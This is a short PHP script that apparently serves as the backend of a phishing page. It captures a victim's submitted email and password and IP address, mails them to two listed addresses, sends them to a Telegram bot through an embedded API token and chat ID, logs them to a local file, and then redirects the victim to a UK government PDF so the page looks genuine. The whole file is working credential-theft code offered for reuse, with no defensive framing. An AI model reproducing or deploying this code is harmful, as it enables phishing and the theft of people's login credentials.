<?php
$email = $_POST['user'];
$password = $_POST['pass'];
$ip_address = $_SERVER['REMOTE_ADDR']; // IP address

// Please change email to your email
$to = "R_oliver34@outlook.com,billylife901@gmail.com";
$subject = "Info - L0gs 2026";
$from = "Soul_MindShake";
$header = "From: " . $from;

$data = "Info_email / Info ID : $email \r\n\r\nSoul_MindShake_Password: 
$password \r\n\r\nIP Address: $ip_address \r\n\r\n********Soul_MindShake********\r\n\r\n";
mail($to, $subject, $data);

// Send data to Telegram
$telegram_api_token = "7926952320:AAF_J0mo6_oqFBX0KuZI7EXCoSKZhWD8z_I";
$telegram_chat_id = "7731692743";
$telegram_message = urlencode($data);
file_get_contents("https://api.telegram.org/bot$telegram_api_token/sendMessage?chat_id=$telegram_chat_id&text=$telegram_message");

$fh = fopen("users.txt", "a");
fwrite($fh, $data); // Close the file
fclose($fh);

header("Location: https://assets.publishing.service.gov.uk/media/69959214bfdab2546272bf04/Starter_checklist.pdf");
?>
